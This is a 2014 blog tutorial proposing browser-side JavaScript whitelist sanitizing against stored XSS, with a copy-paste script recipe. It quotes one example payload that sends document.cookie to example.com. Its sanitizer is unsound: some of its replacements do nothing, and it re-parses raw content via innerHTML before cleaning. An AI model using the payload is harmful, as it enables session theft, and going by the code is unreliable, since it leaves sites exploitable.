Sadda.ru Ironetcart Андроид Ассемблер MASM32 Linux Все статьи Table of Contents


 

Frontend protection against Stored XSS Attacks
(Javascript kills XSS)

  Max Petrov August 2014

Stored XSS attacks

      Cross Site Scripting attack is harmful software impact on the user's browser for the purpose of stealing data or causing other harm. To avoid confusion with CSS (Caskading Style Sheets), to denote Cross Site Scripting it was agreed to use the abbreviation XSS.

      Stored XSS Attacks are those in which harmful Javascript is injected by an attacker into the HTML page. This happens through the input forms (text boxes, input boxes, contenteditable elements) on the site. After clicking the Submit button, XSS is sent to the server and is stored there (hence the name Stored XSS). When users request an infected HTML page, the XSS contained in the message is launched by browsers and attacks.

Server (Backend) protection from Stored XSS Attacks

      The solution to the problem seems to be simple. We must prevent the execution in the browser of Javascript code, which can be contained in the text which users add in the site. It is necessary to neutralize in the messages received from the visitors all the places which explicitly or supposedly include Javascript. Such places are
      HTML nodes <SCRIPT> . . . </SCRIPT> ,
      Event handlers in tags ,
      Pseudo-protocols javascript: .

      The links, pictures, styles in tags (there can be an attribute background) are suspicious. Everything is dangerous, where the Internet address can be specified, hence, it can be written a pseudo-protocol javascript: .

      So, the task is to remove dangerous sequences of characters from the text. Usually it is implemented as follows. On the PHP server, the filter parses the text received from the browser, cuts out from it or replaces in it any suspicious fragments. In this approach, there is an error. Browsers execute Javascript without knowing anything about PHP. The server, on the contrary, knows PHP and does not know Javascript. In server protection from XSS, it is bad that it does not understand what it is doing.

      It becomes clear the direction of the malicious efforts of craftsmen of stored XSS-attacks. These craftsmen select for the attacked sites the various ways to obfuscation of malicious Javascript. The PHP filter does not know Javascript, therefore, the PHP filter can be deceived. The worst of all is that sometimes the PHP filter even helps to infect the site.

      The simplest example. The attacker enters
      <p oonmouseovernmouseover='location.href="http://example.com/" + document.cookie'>
The message is sent to the server. On the server the PHP filter sees the dangerous character sequence onmouseover and cuts it out. As a result, not posing any threat (not recognized by browsers) oonmouseovernmouseover turns into an onmouseover. As you can see, the PHP filter did not prevent, but created an XSS attack.

Browser (Frontend) protection from stored XSS-attacks

      We do not need to build an HTML parser. HTML parsers already exist. They exist in the browsers. By using them, it is attractive to shift the task of recognizing stored XSS attacks (and the protection from them) to the browsers. Then it becomes unnecessary to foresee on the server, whether this or that browser would see the active content in the message posted in the forum. It is more logical to ask the browser. If the browser has detected a script, then we should give the browser an order to neutralize the detected script.

Secure upload to the browsers

      Javascript is executed by the browser during the loading of the page. Even if the text fragment is invisible or hidden, if there is Javascript there, this Javascript will be run. Any HTML tag which would prohibit the execution of Javascript has not been invented yet. If such a tag was invented, the question about stored XSS attacks would not be in principle.

      We need passive loading of text in the browser. This loading prevents Javascript from running. The only thing that comes to mind is to use a comment (<!-- . . . -->). Commented string is not interpreted by browsers, is not displayed, but is loaded and embedded in the DOM (Document Object Model). Thus, obviously having on the page of the site a suspicious content in respect to XSS, we can fearlessly return this page to browsers. It is only necessary to comment in advance the doubtful fragments of the text.

      At the end of the loading, the browser should analyze the parts of the text marked by us, secure them, and only then show to user. We will use the event corresponded to the end of the HTML page loading. It is called onload and is applicable to the HTML node body. We write as following
      <body onload='getid("message")'>,
where getid("message") is a function that accepts id of that node whose content should be analyzed and treated.

Selector of fragments (Javascript function)

      MS browser IExplorer of versions 6 or 7 is still used. Based on the Runet statistics, we can estimate the share of IExplorer 6 and 7 as 1% of traffic. Perhaps, these are the most vulnerable browsers. I think the protection should be built in such a manner that it will work starting from IExplorer 6. It does not matter that this will give some roughness in the code.

      IExplorer 6 in response to document.getElementByClassName() outputs an object (not a collection of objects, as one might expect). We have to adapt to the weakest. We will receive the fragments of text as IExplorer 6 wants, that is, one at one time. We have to allow many fragments with the same id on one HTML page. This is against the rules, but we will get the cross-browser script.

      Function getid(id)
function getid(id) { var obj; while ( document.getElementById(id) ) { obj = document.getElementById(id); obj.removeAttribute("id"); obj.innerHTML = obj.innerHTML.replace("<!--", "").replace("-->", ""); clearhtml(obj); obj.innerHTML = obj.innerHTML.replace(/<[^>]*?script[^>]*?>/gi, ""); obj.innerHTML = obj.innerHTML.replace(/<[^>]*?js:[^>]*?>/gi, ""); } }

      Nothing is complex. Each line has explanations (just put the mouse over and a hint will pop up).

HTML cleaner (Javascript function)

      Using the methods and properties of DOM, in particular, you can get:
      the array of inner HTML nodes,
      the name of each inner HTML node,
      the names of all the attributes of each HTML node.

      In the record
<div id="a2" class="myclass" contenteditable="true" align="right" onmousemove="alert('onmousemove!')" style="color:green" blablabla="blablabla">

div is the name of the HTML node. All the rest (id="a2", class="myclass", contenteditable="true", align="right", onmousemove="alert('onmousemove!')", style="color:green", blablabla="blablabla") is the HTML attributes of div node. All, that is written in the tag according to the form name="value", is an attribute. The attributes will be id, class, style, event handlers, and even nonsense sentence like blablabla = "blablabla". In DOM the attributes are not classified according to their name and value. The attributes of event handlers from the point of view of DOM are not different from other attributes.

      Let's apply the white list approach. This is an exhaustive list of allowed tags and attributes. All that does not correspond to the white list, we will destroy ruthlessly. Algorithm. Go through all the child nodes, deleting ones, which are not in the list. In the same way, go through all the attributes of each of the allowed nodes.

      Functions of highest order (array.forEach(), array.some()) can not be applied, IExplorer 6 does not understand such functions. We will do simple cycles. In addition, IExplorer 6 for any tag will find the full set of attributes (several dozens), even if there are no attributes in the tag. Therefore, we should track by the property specified whether each attribute is specified explicitly.

      Another complication related to IExplorer 6. It is not possible to remove in it event handler attributes, using the node.removeAttribute("attrName"), which is common for other browsers. In explorer it works another way: node.attrName = null. However, then it will be necessary to check (at least on the first characters "on") whether the attribute is an event handler. Otherwise, we'll get an emergency abort of the script if we try to reset to zero any non-zeroable attribute (for example, contentEditable).

      Function clearhtml(obj) :
var tlist = new Array ( 'DIV', 'SPAN', 'IMG', 'P', 'A', 'B', 'I', 'U', 'S', 'TABLE', 'TBODY', 'TR', 'TH', 'TD', 'SUP', 'SUB' ) var alist = new Array ( "class", "style", "align", "src", "href", "alt", "title" ) function clearhtml(obj) { var children = obj.children; for (var i = 0; i < children.length; i++) { if ( children[i].tagName.toUpperCase() == 'BR' ) { continue; } for ( var j = 0; j < tlist.length; j++) { if(children[i].tagName.toUpperCase() == tlist[j]){tagcor = true; break;}else{tagcor = false;} } if ( tagcor ) { j = 0; while (children[i].attributes[j]) { if ( children[i].attributes[j].specified ) { for (var k = 0; k < alist.length; k++) { if (children[i].attributes[j].nodeName == alist[k]){attrcor = true; break;}else{attrcor = false;} } if ( !attrcor ) { if (children[i].attributes[j].nodeName.substring(0,2) == "on") { children[i][children[i].attributes[j].nodeName] = null; } children[i].removeAttribute(children[i].attributes[j].nodeName); children[i].className = "SCRIPTCONTENT"; j--; } } j++; } clearhtml(children[i]); } else { obj.className = "SCRIPTCONTENT"; obj.removeChild(children[i]); } } }

      The explanations in pop up hints. The concepts tag, node, HTML container are used, as synonyms.

      That's all. The code was tested in the browsers: Internet Explorer 6; SlimBrowser 7.00 build 103; Avant Browser 2014 build 7; Firefox 12.0; Safari 5.0.2; Comodo Dragon 4.1.1.12; Opera 18.0; Yandex 13.12.1599.12785; SRWare Iron 6.0.475; Chromium 28.0.1500.75.

In the form of a recipe

      For those who would like to use this, without delving into the meaning, below it is given in the form of a recipe that is suitable for rapid application.

      File script.js :
<SCRIPT> // These are allowed html-containers (all the others will be deleted together with content): var tlist = new Array ( 'DIV', 'SPAN', 'IMG', 'P', 'A', 'B', 'I', 'U', 'S', 'TABLE', 'TBODY', 'TR', 'TH', 'TD', 'SUP', 'SUB' ) // These are allowed attributes (all others will be removed from allowed tags): var alist = new Array ( "class", "style", "align", "src", "href", "alt", "title" ) function getid(id) { var obj; while ( document.getElementById(id) ) { obj = document.getElementById(id); obj.removeAttribute("id"); obj.innerHTML = obj.innerHTML.replace("<!--", "").replace("-->", ""); obj.innerHTML = obj.innerHTML.replace(/script:/gi, "script:"); obj.innerHTML = obj.innerHTML.replace(/js:/gi, "js:"); clearhtml(obj); } } function clearhtml(obj) { var children = obj.children; for (var i = 0; i < children.length; i++) { if ( children[i].tagName.toUpperCase() == 'BR' ) { continue; } for ( var j = 0; j < tlist.length; j++) { if(children[i].tagName.toUpperCase() == tlist[j]){tagcor = true; break;}else{tagcor = false;} } if ( tagcor ) { j = 0; while (children[i].attributes[j]) { if ( children[i].attributes[j].specified ) { for (var k = 0; k < alist.length; k++) { if (children[i].attributes[j].nodeName == alist[k]){attrcor = true; break;}else{attrcor = false;} } if ( !attrcor ) { if (children[i].attributes[j].nodeName.substring(0,2) == "on") { children[i][children[i].attributes[j].nodeName] = null; } children[i].removeAttribute(children[i].attributes[j].nodeName); children[i].className = "SCRIPTCONTENT"; j--; } } j++; } clearhtml(children[i]); } else { obj.className = "SCRIPTCONTENT"; obj.removeChild(children[i]); } } } </SCRIPT>

      Site page on the server:
<html> <head> <script type="text/javascript" src="script.js"></script> </head> <body onload='getid("message")'> <div id ="message"> <!-- HERE IS MALICIOUS CONTENT --> </div> <div id ="message"> <!-- HERE IS MALICIOUS CONTENT --> </div> <div id ="message"> <!-- HERE IS MALICIOUS CONTENT --> </div> </body> </html>

      By red it is highlighted all necessary strings. On the server, the message processing consists solely in deleting the comment tags (if such tags will be detected). In other words, from the text to be added to the site, you must always remove (or replace) the character sequences <!-- and -->. A potentially dangerous fragment must be inserted by server into the container
      <div id ="message"><!-- HERE IS MALICIOUS CONTENT --></div>
Do not forget to write to the tag body the handler onload='getid("message")'. Write the allowed tags and attributes into a script file.

Discussion

      Please, write here your questions, comments, opinions: http://ironburattin.ru/6/index.php .



Table of Contents

Assembler MASM32

      The simplest assembly program (beeper)
      Variables and Data Types of Assembler
      Registers of Processor IA32
      Numerical Systems, conversion of number
      Negative numbers

Other articles

      Frontend protection against Stored XSS Attacks (Javascript kills XSS)
      How to enforce Firefox to update favicon
      How to lock CD autorun in Windows XP
      Javascript Progress Bar for PHP program
      Schultz's tables (Shultzstables.exe)
      Speed of Forum Engine. Files or Database
      The best free programs for reading txt-files on Android smartphones
      Why a stupid forum needs a search option?

     


© Max Petrov При использовании материалов ссылка на sadda.ru обязательна